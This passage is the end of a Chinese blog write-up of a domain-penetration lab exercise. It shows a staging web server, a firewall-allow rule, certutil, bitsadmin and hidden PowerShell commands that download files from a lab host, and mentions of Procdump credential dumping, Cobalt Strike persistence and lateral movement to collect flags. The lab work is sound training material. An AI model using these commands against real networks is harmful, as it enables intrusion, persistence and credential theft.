<p>由于目前没有任何容器可提供文件传输，所以自建。</p>
<ul>
<li><p>在<code>DKRST011</code>机器创建<code>FTP</code>或者<code>Web</code>服务；</p>
<figure class="highlight swift"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> SimpleHTTPServer</span><br><span class="line"><span class="keyword">import</span> SocketServer</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="type">PORT</span> = <span class="number">80</span></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) != <span class="number">2</span>:</span><br><span class="line">	<span class="built_in">print</span>(<span class="string">"use: web.exe port"</span>)</span><br><span class="line"><span class="keyword">else</span>: </span><br><span class="line">	<span class="type">PORT</span> = int(sys.argv[<span class="number">1</span>])</span><br><span class="line">	<span class="type">Handler</span> = <span class="type">SimpleHTTPServer</span>.<span class="type">SimpleHTTPRequestHandler</span></span><br><span class="line">	httpd = <span class="type">SocketServer</span>.<span class="type">TCPServer</span>((<span class="string">""</span>, <span class="type">PORT</span>), <span class="type">Handler</span>)</span><br><span class="line">	<span class="built_in">print</span> <span class="string">"SimpleHTTPServer is "</span>, <span class="type">PORT</span></span><br><span class="line">	<span class="built_in">print</span> <span class="string">"by k8gege"</span></span><br><span class="line">	httpd.serve_forever()</span><br><span class="line">来源：https:<span class="comment">//raw.githubusercontent.com/k8gege/K8tools/master/web.py </span></span><br><span class="line">注：这类型操作也需要添加防火墙规则，防止弹窗</span><br><span class="line">netsh advfirewall firewall add rule name=<span class="string">"web.exe"</span> dir=<span class="keyword">in</span> program=<span class="string">"c:\Users\Public\Downloads\web.exe"</span> action=allow</span><br></pre></td></tr></table></figure>
</li>
<li><p>使用<code>certutil</code>、<code>bitsadmin</code>、<code>powersehll</code>等自带程序下载；</p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">[*]</span> certutil -urlcache -split -f  http://<span class="number">172.16.238.29</span>/<span class="number">1</span>.rar <span class="number">2</span>.rar</span><br><span class="line"><span class="string">[*]</span> bitsadmin /rawreturn /transfer 任务名 http://<span class="number">172.16.238.29</span>/<span class="number">1</span>.rar <span class="number">2</span>.rar</span><br><span class="line"><span class="string">[*]</span> powershell -WindowStyle Hidden <span class="string">"IEX (New-Object Net.WebClient).DownloadFile('http://172.16.238.29/1.rar','c:\windows\temp\ 2.rar')"</span></span><br></pre></td></tr></table></figure>
<p>这里有人就会问了，为什么不将需要使用的东西放入到域共享目录里面，原因是要操作的机器访问域共享提示无法访问。</p>
</li>
</ul>
<p>往下就是<code>Procdump</code>的一些操作，成功获取到明文密码。</p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">[*]</span> 高权限计划任务启动CS服务端，未上线。</span><br><span class="line"><span class="string">[*]</span> 添加HKLM自启动，未上线。</span><br><span class="line"></span><br><span class="line">这是什么问题呢？（未解决）</span><br></pre></td></tr></table></figure>
<h1 id="0x05-其余flag获取"><a href="#0x05-其余flag获取" class="headerlink" title="0x05 其余flag获取"></a>0x05 其余flag获取</h1><p>从提示与目的来判断，剩下的<code>2个flag</code>位于<code>demo.rcoil.local域</code>的域控、域用户名为<code>flagav</code>的机器上。</p>
<ul>
<li><p><code>flagav</code>用户机器<br>直接从<code>AdAudit Plus</code>获取到域用户<code>flagav</code>的登陆情况，这样就不用去翻日志了。<br>使用<code>CrackMapExec</code>、<code>wmiexec</code>等工具执行命令查找flag：</p>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml">flag</span><span class="template-variable">&#123;Cease_to_struggle_and_you_cease_to_live&#125;</span><span class="xml"></span></span><br></pre></td></tr></table></figure>
</li>
<li><p>子域域控flag</p>
</li>
</ul>
<p>使用主域控的域管可直接登陆子域的域控</p>
<figure class="highlight ceylon"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;Success<span class="number">_</span>grows<span class="number">_</span><span class="keyword">out</span><span class="number">_</span><span class="keyword">of</span><span class="number">_</span>struggles<span class="number">_</span>to<span class="number">_</span>overcome<span class="number">_</span>difficulties&#125;</span><br></pre></td></tr></table></figure>
<h1 id="0x0x-最后的拓扑"><a href="#0x0x-最后的拓扑" class="headerlink" title="0x0x 最后的拓扑"></a>0x0x 最后的拓扑</h1><p>好多没去了解，就草草结束了。</p>
<p><img src="/image/内网练习（四）/网络拓扑.png" alt="网络拓扑"></p>
<p><strong>免责声明：</strong>文章中所提到的工具/教程，不得用于商业或非法用途，否则后果自负。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/wechatpay.jpg" alt="RcoIl WeChat Pay">
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>嘤嘤怪：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://rcoil.me/2019/03/内网练习（四）/" title="内网练习（四）- 知识梳理">https://rcoil.me/2019/03/内网练习（四）/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/内网/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 内网</a>
          
            <a href="/tags/系统安全/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 系统安全</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/【域渗透】获取域环境内用户登录信息/" rel="next" title="【域渗透】获取域环境内用户登录信息">
                <i class="fa fa-chevron-left"></i> 【域渗透】获取域环境内用户登录信息
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/Pass The Hash/" rel="prev" title="Pass The Hash [ 知识回顾 ]">
                Pass The Hash [ 知识回顾 ] <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="RcoIl">
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">38</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">19</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        
		
		
          <div class="feed-link motion-element">
            <div id="days"></div>
			<script language="javascript">
			function show_date_time(){
				window.setTimeout("show_date_time()", 1000);
				BirthDay=new Date("09/01/2016 10:13:14");
				today=new Date();
				timeold=(today.getTime()-BirthDay.getTime());
				sectimeold=timeold/1000
				secondsold=Math.floor(sectimeold);
				msPerDay=24*60*60*1000
				e_daysold=timeold/msPerDay
				daysold=Math.floor(e_daysold);
				e_hrsold=(e_daysold-daysold)*24;
				hrsold=setzero(Math.floor(e_hrsold));
				e_minsold=(e_hrsold-hrsold)*60;
				minsold=setzero(Math.floor((e_hrsold-hrsold)*60));
				seconds=setzero(Math.floor((e_minsold-minsold)*60));
				document.getElementById('days').innerHTML="本站已运行 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分"+ seconds +" 秒";
			}
			function setzero(i){
				if (i<10)
				{i="0" + i};
				return i;
			}		
			show_date_time();
		</script>
        </div>
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://rootrain.me/" title="rootrain" target="_blank">rootrain</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.luolikong.vip/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://cate4cafe.com/" title="cate4cafe" target="_blank">cate4cafe</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://52stu.me/" title="IversOn5" target="_blank">IversOn5</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://klionsec.github.io/" title="klion" target="_blank">klion</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hone.cool/" title="Hone" target="_blank">Hone</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://sharecast.bitcron.com/" title="sharecast" target="_blank">sharecast</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://scarletf.github.io/" title="ScarletF" target="_blank">ScarletF</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.lz1y.cn/" title="Lz1y" target="_blank">Lz1y</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-前言"><span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-靶机信息收集"><span class="nav-text">0x01 靶机信息收集</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-对域内信息进行获取"><span class="nav-text">0x02 对域内信息进行获取</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1）问题（均为RAT上运行）"><span class="nav-text">1）问题（均为RAT上运行）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2）方案"><span class="nav-text">2）方案</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3）域信息的收集结果大致如下"><span class="nav-text">3）域信息的收集结果大致如下</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-域控（域管理员）权限获取方法"><span class="nav-text">0x03 域控（域管理员）权限获取方法</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1）-常规方法及结果"><span class="nav-text">1） 常规方法及结果</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2）-主流方法及结果"><span class="nav-text">2） 主流方法及结果</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3）-辅助工具"><span class="nav-text">3） 辅助工具</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-域控权限"><span class="nav-text">0x04 域控权限</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1）实施"><span class="nav-text">1）实施</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2）遇到问题"><span class="nav-text">2）遇到问题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3）方案"><span class="nav-text">3）方案</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-获取域管明文密码"><span class="nav-text">0x05 获取域管明文密码</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-其余flag获取"><span class="nav-text">0x05 其余flag获取</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x0x-最后的拓扑"><span class="nav-text">0x0x 最后的拓扑</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
<!--
    <i class="fa fa-heart"></i>
-->
	<i class="fa fa-address-card-o" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
